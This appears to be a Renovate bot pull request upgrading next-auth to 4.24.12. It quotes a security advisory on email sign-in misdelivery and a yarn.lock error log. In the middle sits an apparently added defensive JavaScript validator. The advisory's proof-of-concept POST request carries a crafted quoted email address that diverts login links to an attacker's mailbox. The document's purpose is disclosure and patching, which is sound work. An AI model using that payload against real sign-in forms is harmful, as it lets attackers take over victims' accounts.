
chore(deps): update dependency next-auth to v4.24.12 [security]

Open renovate[bot] opened this issue 1 month ago • 1 comment

This PR contains the following updates:

Package             Change
next-auth (source)  4.24.7 -> 4.24.12

GitHub Vulnerability Alerts

GHSA-5jpx-9hw9-2fx4

Summary

NextAuth.js's email sign-in can be forced to deliver authentication emails to an attacker-controlled mailbox due to a bug in nodemailer's address parser used by the project (fixed in nodemailer v7.0.7). A crafted input such as:

"[email protected]"@victim.com

is parsed incorrectly and results in the message being delivered to [email protected] (attacker) instead of "<[email protected]>@victim.com" (the intended recipient at victim.com), in violation of RFC 5321/5322 semantics. This allows an attacker to receive login/verification links or other sensitive emails intended for the victim.

Affected NextAuthjs Version

Version            Affected
≤ 4.24.11          Yes
≤ 5.0.0-beta.29    Yes

POC

Example Setup showing misdelivery of email

import NextAuth from "next-auth"
import Nodemailer from "next-auth/providers/nodemailer"
import { PrismaAdapter } from "@auth/prisma-adapter"
import { prisma } from "@/lib/prisma"

export const { handlers, auth, signIn, signOut } = NextAuth({
  adapter: PrismaAdapter(prisma),
  providers: [
    Nodemailer({
      // Local SMTP sink on 127.0.0.1:1025 so the delivered envelope can be inspected
      server: {
        host: "127.0.0.1",
        port: 1025,
        ...
      },
      from: "[email protected]",
    }),
  ],
  pages: {
    signIn: '/auth/signin',
    verifyRequest: '/auth/verify-request',
  },
})

POST /api/auth/signin/nodemailer HTTP/1.1
Accept-Encoding: gzip, deflate, br, zstd
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 176
DNT: 1
Host: localhost:3000
Origin: http://localhost:3000
Pragma: no-cache
Referer: http://localhost:3000/auth/signin
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
accept: */*
accept-language: en-US,en;q=0.9,ta;q=0.8
content-type: application/x-www-form-urlencoded
sec-ch-ua: "Google Chrome";v="141", "Not?A_Brand";v="8", "Chromium";v="141"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
x-auth-return-redirect: 1

email=%22e%40attacker.coccm%22%40victim.com&csrfToken=90f5e6f48ab577ab011f212011862dcfe546459c23764cf891aab2d176f8d77a&callbackUrl=http%3A%2F%2Flocalhost%3A3000%2Fauth%2Fsignin
[Screenshot from 2025-10-25 21-15-25] [Screenshot from 2025-10-25 21-14-47]

Mitigation

Update to nodemailer 7.0.7

Credits

https://zeropath.com/ helped identify this security issue


Release Notes

nextauthjs/next-auth (next-auth)

v4.24.12

Compare Source

v4.24.11

Compare Source

v4.24.10

Compare Source

What's Changed

Full Changelog: https://github.com/nextauthjs/next-auth/compare/[email protected]@4.24.10

v4.24.9

Compare Source

What's Changed

New Contributors

Full Changelog: https://github.com/nextauthjs/next-auth/compare/[email protected]@4.24.9

v4.24.8

Compare Source

What's Changed

New Contributors

Full Changelog: https://github.com/nextauthjs/next-auth/compare/[email protected]@4.24.8


Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • [ ] If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

renovate[bot] avatar Oct 29 '25 17:10 renovate[bot]
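The advisory above turns on how a submitted address is split into local part and domain. Under RFC 5321 a quoted local part may itself contain "@", so "e@attacker.coccm"@victim.com names one mailbox at victim.com, and a parser that does not honour the quotes hands the message to the attacker's domain instead. Besides taking the fixed nodemailer, an application can refuse such inputs at the sign-in boundary. The following is an added example, not code from next-auth, nodemailer or this PR: parseMailbox splits an address with quoting rules and identifies the real domain, safeIdentifier accepts only an unquoted dot-atom local part plus a dotted domain, emailFromForm decodes the form body the sign-in endpoint receives, and demo runs all three over the proof-of-concept body from above. All identifiers are this example's own; the wiring comment naming the Email/Nodemailer provider's normalizeIdentifier option is an assumption about the provider API.

```javascript
// Added example (not next-auth or nodemailer code): parse the address a user
// submits to the email sign-in form with RFC 5321 quoting rules, then refuse
// anything that is not a plain dot-atom mailbox before it reaches the mail
// transport. Function and constant names below are this example's own.

// Conservative local-part alphabet accepted for sign-in (a subset of RFC 5322 atext).
const SAFE_LOCAL = /^[a-z0-9._%+-]+$/i;
// Dotted domain: labels of letters/digits/hyphens, at least one dot (no bare "localhost").
const DOMAIN = /^[a-z0-9]([a-z0-9-]*[a-z0-9])?(\.[a-z0-9]([a-z0-9-]*[a-z0-9])?)+$/i;

// Returns { local, domain, quoted } or null. The separator is the first "@"
// that lies outside a quoted-string; "@" inside quotes belongs to the local part.
function parseMailbox(addr) {
  let inQuotes = false;
  let sawQuote = false;
  let local = "";
  let i = 0;
  for (; i < addr.length; i++) {
    const c = addr[i];
    if (inQuotes && c === "\\" && i + 1 < addr.length) {
      local += addr[++i]; // quoted-pair: keep the escaped character
      continue;
    }
    if (c === '"') { inQuotes = !inQuotes; sawQuote = true; continue; }
    if (c === "@" && !inQuotes) break; // first "@" outside quotes ends the local part
    local += c;
  }
  // Unterminated quote, no "@" at all, or empty local part: not a mailbox.
  if (inQuotes || i >= addr.length || local.length === 0) return null;
  const domain = addr.slice(i + 1);
  if (!DOMAIN.test(domain)) return null; // also rejects "alice@@victim.com"
  return { local, domain, quoted: sawQuote };
}

// Hardened identifier normaliser: only an unquoted dot-atom local part and a
// dotted domain are accepted, lower-cased. Everything else throws, so a magic
// link is never generated for an address whose delivery target is ambiguous.
// Wiring (assumption about the provider API, verify against your version):
//   EmailProvider({ server, from, normalizeIdentifier: safeIdentifier })
function safeIdentifier(input) {
  const parsed = parseMailbox(String(input).trim());
  if (!parsed) throw new Error("invalid email address");
  if (parsed.quoted) throw new Error("quoted local parts are not accepted for sign-in");
  if (!SAFE_LOCAL.test(parsed.local)) throw new Error("unsupported characters in local part");
  return `${parsed.local}@${parsed.domain}`.toLowerCase();
}

// Pull the "email" field out of the x-www-form-urlencoded body the sign-in endpoint receives.
function emailFromForm(body) {
  return new URLSearchParams(body).get("email") ?? "";
}

// Constructed sample: the form body from the proof of concept above.
const POC_BODY =
  "email=%22e%40attacker.coccm%22%40victim.com" +
  "&csrfToken=90f5e6f48ab577ab011f212011862dcfe546459c23764cf891aab2d176f8d77a" +
  "&callbackUrl=http%3A%2F%2Flocalhost%3A3000%2Fauth%2Fsignin";

// Runs the pipeline over the PoC body and over an ordinary address.
function demo() {
  const submitted = emailFromForm(POC_BODY); // "e@attacker.coccm"@victim.com
  const parsed = parseMailbox(submitted);    // RFC view: local e@attacker.coccm, domain victim.com
  let accepted;
  try {
    accepted = safeIdentifier(submitted);
  } catch (e) {
    accepted = `rejected: ${e.message}`;
  }
  return { submitted, parsed, accepted, normal: safeIdentifier(" Alice@Victim.com ") };
}

console.log(demo());
```

parseMailbox deliberately reports victim.com as the domain for the PoC address, which is what a compliant transport must do; safeIdentifier then rejects the address anyway, because a sign-in flow has no business accepting quoted local parts, and rejecting them removes the whole class of parser disagreements from the path that emits authentication links.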

⚠️ Artifact update problem

Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

  • any of the package files in this branch needs updating, or
  • the branch becomes conflicted, or
  • you click the rebase/retry checkbox if found above, or
  • you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: yarn.lock
/opt/containerbase/tools/corepack/0.34.4/16.20.2/node_modules/corepack/dist/lib/corepack.cjs:22555
  const isURL = URL.canParse(range);
                    ^

TypeError: URL.canParse is not a function
    at parseSpec (/opt/containerbase/tools/corepack/0.34.4/16.20.2/node_modules/corepack/dist/lib/corepack.cjs:22555:21)
    at Object.getSpec (/opt/containerbase/tools/corepack/0.34.4/16.20.2/node_modules/corepack/dist/lib/corepack.cjs:22704:55)
    at Engine.findProjectSpec (/opt/containerbase/tools/corepack/0.34.4/16.20.2/node_modules/corepack/dist/lib/corepack.cjs:22922:31)
    at async Engine.executePackageManagerRequest (/opt/containerbase/tools/corepack/0.34.4/16.20.2/node_modules/corepack/dist/lib/corepack.cjs:22961:24)
    at async Object.runMain (/opt/containerbase/tools/corepack/0.34.4/16.20.2/node_modules/corepack/dist/lib/corepack.cjs:23667:7)

renovate[bot] avatar Oct 29 '25 17:10 renovate[bot]